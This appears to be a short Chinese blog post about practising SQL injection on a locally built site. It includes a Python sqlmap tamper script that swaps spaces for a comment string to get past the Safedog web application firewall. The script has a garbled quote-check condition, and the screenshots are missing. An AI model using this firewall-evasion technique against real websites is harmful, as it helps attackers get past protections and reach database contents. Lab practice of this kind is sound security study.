sqlmap过狗脚本练习1
本地搭建sql注入网站练习
?
测试安全狗,输入不合法参数被安全狗拦截:
?
使用sqlmap:
?
?
检测到防护机制,失败;
先手工尝试绕过安全狗:
?
将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;
写个sqlmap脚本:
#demo.py def tamper(payload,**kwargs): retVal = payload quote=False if payload: retVal = ‘‘ for i in payload: if i =="‘" and i==‘"‘: quote = not quote elif i.isspace() and not quote: retVal+=‘/*//\*//\*\/c*/‘ else: retVal+=i return retVal
加上脚本继续跑:
?
?
成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)
相关推荐
tanrong 2019-12-16
zyjj 2020-07-04
bluet00 2020-06-25
godfather 2020-06-13
lt云飞扬gt 2020-06-09
旗木卡卡西 2020-06-02
liuyang000 2020-03-05
xuanlvhaoshao 2020-02-21
ItBJLan 2020-02-20
tanrong 2020-02-15
gwn00 2020-02-01
一对儿程序猿 2020-01-18
xuanlvhaoshao 2020-01-02
gwn00 2020-01-09
tanrong 2019-12-22
一对儿程序猿 2019-11-10
YFCEMBEDD 2019-11-09